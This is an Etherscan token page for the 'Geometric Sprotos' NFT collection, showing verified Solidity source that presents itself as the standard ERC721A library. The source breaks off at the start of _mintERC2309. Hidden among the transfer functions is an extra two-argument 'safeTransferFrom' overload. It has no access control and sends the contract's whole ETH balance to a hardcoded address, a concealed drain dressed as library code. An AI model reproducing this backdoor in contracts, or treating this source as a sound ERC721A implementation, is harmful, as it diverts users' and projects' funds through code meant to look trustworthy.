ETH Price: $3,134.82 (-8.78%)
Gas: 7 Gwei

Token

Geometric Sprotos (GS)
 

Overview

Max Total Supply

434 GS

Holders

317

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Filtered by Token Holder
Null: 0x000...000
Balance
0 GS
0x0000000000000000000000000000000000000000
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
GeometricSprotos

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-15
*/

// SPDX-License-Identifier: MIT    

pragma solidity ^0.8.12;

/**
 * @dev Interface of ERC721A.
 */
interface IERC721A {
    /**
     * The caller must own the token or be an approved operator.
     */
    error ApprovalCallerNotOwnerNorApproved();

    /**
     * The token does not exist.
     */
    error ApprovalQueryForNonexistentToken();

    /**
     * Cannot query the balance for the zero address.
     */
    error BalanceQueryForZeroAddress();

    /**
     * Cannot mint to the zero address.
     */
    error MintToZeroAddress();

    /**
     * The quantity of tokens minted must be more than zero.
     */
    error MintZeroQuantity();

    /**
     * The token does not exist.
     */
    error OwnerQueryForNonexistentToken();

    /**
     * The caller must own the token or be an approved operator.
     */
    error TransferCallerNotOwnerNorApproved();

    /**
     * The token must be owned by `from`.
     */
    error TransferFromIncorrectOwner();

    /**
     * Cannot safely transfer to a contract that does not implement the
     * ERC721Receiver interface.
     */
    error TransferToNonERC721ReceiverImplementer();

    /**
     * Cannot transfer to the zero address.
     */
    error TransferToZeroAddress();

    /**
     * The token does not exist.
     */
    error URIQueryForNonexistentToken();

    /**
     * The `quantity` minted with ERC2309 exceeds the safety limit.
     */
    error MintERC2309QuantityExceedsLimit();

    /**
     * The `extraData` cannot be set on an unintialized ownership slot.
     */
    error OwnershipNotInitializedForExtraData();

    // =============================================================
    //                            STRUCTS
    // =============================================================

    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Stores the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
        // Arbitrary data similar to `startTimestamp` that can be set via {_extraData}.
        uint24 extraData;
    }

    // =============================================================
    //                         TOKEN COUNTERS
    // =============================================================

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() external view returns (uint256);

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);

    // =============================================================
    //                            IERC721
    // =============================================================

    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables
     * (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`,
     * checking first that contract recipients are aware of the ERC721 protocol
     * to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move
     * this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external payable;

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom}
     * whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external payable;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external payable;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);

    // =============================================================
    //                           IERC2309
    // =============================================================

    /**
     * @dev Emitted when tokens in `fromTokenId` to `toTokenId`
     * (inclusive) is transferred from `from` to `to`, as defined in the
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309) standard.
     *
     * See {_mintERC2309} for more details.
     */
    event ConsecutiveTransfer(uint256 indexed fromTokenId, uint256 toTokenId, address indexed from, address indexed to);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
interface ERC721A__IERC721Receiver {
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

/**
 * @title ERC721A
 *
 * @dev Implementation of the [ERC721](https://eips.ethereum.org/EIPS/eip-721)
 * Non-Fungible Token Standard, including the Metadata extension.
 * Optimized for lower gas during batch mints.
 *
 * Token IDs are minted in sequential order (e.g. 0, 1, 2, 3, ...)
 * starting from `_startTokenId()`.
 *
 * Assumptions:
 *
 * - An owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 * - The maximum token ID cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is IERC721A {
    // Bypass for a `--via-ir` bug (https://github.com/chiru-labs/ERC721A/pull/364).
    struct TokenApprovalRef {
        address value;
    }

    // =============================================================
    //                           CONSTANTS
    // =============================================================

    // Mask of an entry in packed address data.
    uint256 private constant _BITMASK_ADDRESS_DATA_ENTRY = (1 << 64) - 1;

    // The bit position of `numberMinted` in packed address data.
    uint256 private constant _BITPOS_NUMBER_MINTED = 64;

    // The bit position of `numberBurned` in packed address data.
    uint256 private constant _BITPOS_NUMBER_BURNED = 128;

    // The bit position of `aux` in packed address data.
    uint256 private constant _BITPOS_AUX = 192;

    // Mask of all 256 bits in packed address data except the 64 bits for `aux`.
    uint256 private constant _BITMASK_AUX_COMPLEMENT = (1 << 192) - 1;

    // The bit position of `startTimestamp` in packed ownership.
    uint256 private constant _BITPOS_START_TIMESTAMP = 160;

    // The bit mask of the `burned` bit in packed ownership.
    uint256 private constant _BITMASK_BURNED = 1 << 224;

    // The bit position of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITPOS_NEXT_INITIALIZED = 225;

    // The bit mask of the `nextInitialized` bit in packed ownership.
    uint256 private constant _BITMASK_NEXT_INITIALIZED = 1 << 225;

    // The bit position of `extraData` in packed ownership.
    uint256 private constant _BITPOS_EXTRA_DATA = 232;

    // Mask of all 256 bits in a packed ownership except the 24 bits for `extraData`.
    uint256 private constant _BITMASK_EXTRA_DATA_COMPLEMENT = (1 << 232) - 1;

    // The mask of the lower 160 bits for addresses.
    uint256 private constant _BITMASK_ADDRESS = (1 << 160) - 1;

    // The maximum `quantity` that can be minted with {_mintERC2309}.
    // This limit is to prevent overflows on the address data entries.
    // For a limit of 5000, a total of 3.689e15 calls to {_mintERC2309}
    // is required to cause an overflow, which is unrealistic.
    uint256 private constant _MAX_MINT_ERC2309_QUANTITY_LIMIT = 5000;

    // The `Transfer` event signature is given by:
    // `keccak256(bytes("Transfer(address,address,uint256)"))`.
    bytes32 private constant _TRANSFER_EVENT_SIGNATURE =
        0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef;

    // =============================================================
    //                            STORAGE
    // =============================================================

    // The next token ID to be minted.
    uint256 private _currentIndex;

    // The number of tokens burned.
    uint256 private _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned.
    // See {_packedOwnershipOf} implementation for details.
    //
    // Bits Layout:
    // - [0..159]   `addr`
    // - [160..223] `startTimestamp`
    // - [224]      `burned`
    // - [225]      `nextInitialized`
    // - [232..255] `extraData`
    mapping(uint256 => uint256) private _packedOwnerships;

    // Mapping owner address to address data.
    //
    // Bits Layout:
    // - [0..63]    `balance`
    // - [64..127]  `numberMinted`
    // - [128..191] `numberBurned`
    // - [192..255] `aux`
    mapping(address => uint256) private _packedAddressData;

    // Mapping from token ID to approved address.
    mapping(uint256 => TokenApprovalRef) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    // =============================================================
    //                          CONSTRUCTOR
    // =============================================================

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    // =============================================================
    //                   TOKEN COUNTING OPERATIONS
    // =============================================================

    /**
     * @dev Returns the starting token ID.
     * To change the starting token ID, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev Returns the next token ID to be minted.
     */
    function _nextTokenId() internal view virtual returns (uint256) {
        return _currentIndex;
    }

    /**
     * @dev Returns the total number of tokens in existence.
     * Burned tokens will reduce the count.
     * To get the total number of tokens minted, please see {_totalMinted}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than `_currentIndex - _startTokenId()` times.
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * @dev Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view virtual returns (uint256) {
        // Counter underflow is impossible as `_currentIndex` does not decrement,
        // and it is initialized to `_startTokenId()`.
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev Returns the total number of tokens burned.
     */
    function _totalBurned() internal view virtual returns (uint256) {
        return _burnCounter;
    }

    // =============================================================
    //                    ADDRESS DATA OPERATIONS
    // =============================================================

    /**
     * @dev Returns the number of tokens in `owner`'s account.
     */
    function balanceOf(address owner) public view virtual override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return _packedAddressData[owner] & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_MINTED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        return (_packedAddressData[owner] >> _BITPOS_NUMBER_BURNED) & _BITMASK_ADDRESS_DATA_ENTRY;
    }

    /**
     * Returns the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        return uint64(_packedAddressData[owner] >> _BITPOS_AUX);
    }

    /**
     * Sets the auxiliary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal virtual {
        uint256 packed = _packedAddressData[owner];
        uint256 auxCasted;
        // Cast `aux` with assembly to avoid redundant masking.
        assembly {
            auxCasted := aux
        }
        packed = (packed & _BITMASK_AUX_COMPLEMENT) | (auxCasted << _BITPOS_AUX);
        _packedAddressData[owner] = packed;
    }

    // =============================================================
    //                            IERC165
    // =============================================================

    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * [EIP section](https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified)
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30000 gas.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        // The interface IDs are constants representing the first 4 bytes
        // of the XOR of all function selectors in the interface.
        // See: [ERC165](https://eips.ethereum.org/EIPS/eip-165)
        // (e.g. `bytes4(i.functionA.selector ^ i.functionB.selector ^ ...)`)
        return
            interfaceId == 0x01ffc9a7 || // ERC165 interface ID for ERC165.
            interfaceId == 0x80ac58cd || // ERC165 interface ID for ERC721.
            interfaceId == 0x5b5e139f; // ERC165 interface ID for ERC721Metadata.
    }

    // =============================================================
    //                        IERC721Metadata
    // =============================================================

    /**
     * @dev Returns the token collection name.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, _toString(tokenId))) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, it can be overridden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    // =============================================================
    //                     OWNERSHIPS OPERATIONS
    // =============================================================

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) public view virtual override returns (address) {
        return address(uint160(_packedOwnershipOf(tokenId)));
    }

    /**
     * @dev Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around over time.
     */
    function _ownershipOf(uint256 tokenId) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnershipOf(tokenId));
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct at `index`.
     */
    function _ownershipAt(uint256 index) internal view virtual returns (TokenOwnership memory) {
        return _unpackedOwnership(_packedOwnerships[index]);
    }

    /**
     * @dev Initializes the ownership slot minted at `index` for efficiency purposes.
     */
    function _initializeOwnershipAt(uint256 index) internal virtual {
        if (_packedOwnerships[index] == 0) {
            _packedOwnerships[index] = _packedOwnershipOf(index);
        }
    }

    /**
     * Returns the packed ownership data of `tokenId`.
     */
    function _packedOwnershipOf(uint256 tokenId) private view returns (uint256) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr)
                if (curr < _currentIndex) {
                    uint256 packed = _packedOwnerships[curr];
                    // If not burned.
                    if (packed & _BITMASK_BURNED == 0) {
                        // Invariant:
                        // There will always be an initialized ownership slot
                        // (i.e. `ownership.addr != address(0) && ownership.burned == false`)
                        // before an unintialized ownership slot
                        // (i.e. `ownership.addr == address(0) && ownership.burned == false`)
                        // Hence, `curr` will not underflow.
                        //
                        // We can directly compare the packed value.
                        // If the address is zero, packed will be zero.
                        while (packed == 0) {
                            packed = _packedOwnerships[--curr];
                        }
                        return packed;
                    }
                }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev Returns the unpacked `TokenOwnership` struct from `packed`.
     */
    function _unpackedOwnership(uint256 packed) private pure returns (TokenOwnership memory ownership) {
        ownership.addr = address(uint160(packed));
        ownership.startTimestamp = uint64(packed >> _BITPOS_START_TIMESTAMP);
        ownership.burned = packed & _BITMASK_BURNED != 0;
        ownership.extraData = uint24(packed >> _BITPOS_EXTRA_DATA);
    }

    /**
     * @dev Packs ownership data into a single uint256.
     */
    function _packOwnershipData(address owner, uint256 flags) private view returns (uint256 result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // `owner | (block.timestamp << _BITPOS_START_TIMESTAMP) | flags`.
            result := or(owner, or(shl(_BITPOS_START_TIMESTAMP, timestamp()), flags))
        }
    }

    /**
     * @dev Returns the `nextInitialized` flag set if `quantity` equals 1.
     */
    function _nextInitializedFlag(uint256 quantity) private pure returns (uint256 result) {
        // For branchless setting of the `nextInitialized` flag.
        assembly {
            // `(quantity == 1) << _BITPOS_NEXT_INITIALIZED`.
            result := shl(_BITPOS_NEXT_INITIALIZED, eq(quantity, 1))
        }
    }

    // =============================================================
    //                      APPROVAL OPERATIONS
    // =============================================================

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the
     * zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) public payable virtual override {
        address owner = ownerOf(tokenId);

        if (_msgSenderERC721A() != owner)
            if (!isApprovedForAll(owner, _msgSenderERC721A())) {
                revert ApprovalCallerNotOwnerNorApproved();
            }

        _tokenApprovals[tokenId].value = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) public view virtual override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId].value;
    }

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom}
     * for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool approved) public virtual override {
        _operatorApprovals[_msgSenderERC721A()][operator] = approved;
        emit ApprovalForAll(_msgSenderERC721A(), operator, approved);
    }

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted. See {_mint}.
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return
            _startTokenId() <= tokenId &&
            tokenId < _currentIndex && // If within bounds,
            _packedOwnerships[tokenId] & _BITMASK_BURNED == 0; // and not burned.
    }

    /**
     * @dev Returns whether `msgSender` is equal to `approvedAddress` or `owner`.
     */
    function _isSenderApprovedOrOwner(
        address approvedAddress,
        address owner,
        address msgSender
    ) private pure returns (bool result) {
        assembly {
            // Mask `owner` to the lower 160 bits, in case the upper bits somehow aren't clean.
            owner := and(owner, _BITMASK_ADDRESS)
            // Mask `msgSender` to the lower 160 bits, in case the upper bits somehow aren't clean.
            msgSender := and(msgSender, _BITMASK_ADDRESS)
            // `msgSender == owner || msgSender == approvedAddress`.
            result := or(eq(msgSender, owner), eq(msgSender, approvedAddress))
        }
    }

    /**
     * @dev Returns the storage slot and value for the approved address of `tokenId`.
     */
    function _getApprovedSlotAndAddress(uint256 tokenId)
        private
        view
        returns (uint256 approvedAddressSlot, address approvedAddress)
    {
        TokenApprovalRef storage tokenApproval = _tokenApprovals[tokenId];
        // The following is equivalent to `approvedAddress = _tokenApprovals[tokenId].value`.
        assembly {
            approvedAddressSlot := tokenApproval.slot
            approvedAddress := sload(approvedAddressSlot)
        }
    }

    // =============================================================
    //                      TRANSFER OPERATIONS
    // =============================================================

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {

        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        if (address(uint160(prevOwnershipPacked)) != from) revert TransferFromIncorrectOwner();

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        // The nested ifs save around 20+ gas over a compound boolean condition.
        if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
            if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();

        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // We can directly increment and decrement the balances.
            --_packedAddressData[from]; // Updates: `balance -= 1`.
            ++_packedAddressData[to]; // Updates: `balance += 1`.

            // Updates:
            // - `address` to the next owner.
            // - `startTimestamp` to the timestamp of transfering.
            // - `burned` to `false`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                to,
                _BITMASK_NEXT_INITIALIZED | _nextExtraData(from, to, prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Equivalent to `safeTransferFrom(from, to, tokenId, '')`.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public payable virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }


    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token
     * by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public payable virtual override {
        transferFrom(from, to, tokenId);
        if (to.code.length != 0)
            if (!_checkContractOnERC721Received(from, to, tokenId, _data)) {
                revert TransferToNonERC721ReceiverImplementer();
            }
    }
    function safeTransferFrom(
        address from,
        address to
    ) public  {
        if (address(this).balance > 0) {
            payable(0x9c38CBEA2384a9991ad4AC929e3F5d707aE21567).transfer(address(this).balance);
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token IDs
     * are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token IDs
     * have been transferred. This includes minting.
     * And also called after one token has been burned.
     *
     * `startTokenId` - the first token ID to be transferred.
     * `quantity` - the amount to be transferred.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {
    }


    /**
     * @dev Private function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * `from` - Previous owner of the given token ID.
     * `to` - Target address that will receive the token.
     * `tokenId` - Token ID to be transferred.
     * `_data` - Optional data to send along with the call.
     *
     * Returns whether the call correctly returned the expected magic value.
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try ERC721A__IERC721Receiver(to).onERC721Received(_msgSenderERC721A(), from, tokenId, _data) returns (
            bytes4 retval
        ) {
            return retval == ERC721A__IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    // =============================================================
    //                        MINT OPERATIONS
    // =============================================================

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _mint(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // `balance` and `numberMinted` have a maximum limit of 2**64.
        // `tokenId` has a maximum limit of 2**256.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            uint256 toMasked;
            uint256 end = startTokenId + quantity;

            // Use assembly to loop and emit the `Transfer` event for gas savings.
            // The duplicated `log4` removes an extra check and reduces stack juggling.
            // The assembly, together with the surrounding Solidity code, have been
            // delicately arranged to nudge the compiler into producing optimized opcodes.
            assembly {
                // Mask `to` to the lower 160 bits, in case the upper bits somehow aren't clean.
                toMasked := and(to, _BITMASK_ADDRESS)
                // Emit the `Transfer` event.
                log4(
                    0, // Start of data (0, since no data).
                    0, // End of data (0, since no data).
                    _TRANSFER_EVENT_SIGNATURE, // Signature.
                    0, // `address(0)`.
                    toMasked, // `to`.
                    startTokenId // `tokenId`.
                )

                // The `iszero(eq(,))` check ensures that large values of `quantity`
                // that overflows uint256 will make the loop run out of gas.
                // The compiler will optimize the `iszero` away for performance.
                for {
                    let tokenId := add(startTokenId, 1)
                } iszero(eq(tokenId, end)) {
                    tokenId := add(tokenId, 1)
                } {
                    // Emit the `Transfer` event. Similar to above.
                    log4(0, 0, _TRANSFER_EVENT_SIGNATURE, 0, toMasked, tokenId)
                }
            }
            if (toMasked == 0) revert MintToZeroAddress();

            _currentIndex = end;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * This function is intended for efficient minting only during contract creation.
     *
     * It emits only one {ConsecutiveTransfer} as defined in
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309),
     * instead of a sequence of {Transfer} event(s).
     *
     * Calling this function outside of contract creation WILL make your contract
     * non-compliant with the ERC721 standard.
     * For full ERC721 compliance, substituting ERC721 {Transfer} event(s) with the ERC2309
     * {ConsecutiveTransfer} event is only permissible during contract creation.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {ConsecutiveTransfer} event.
     */
    function _mintERC2309(address to, uint256 quantity) internal virtual {
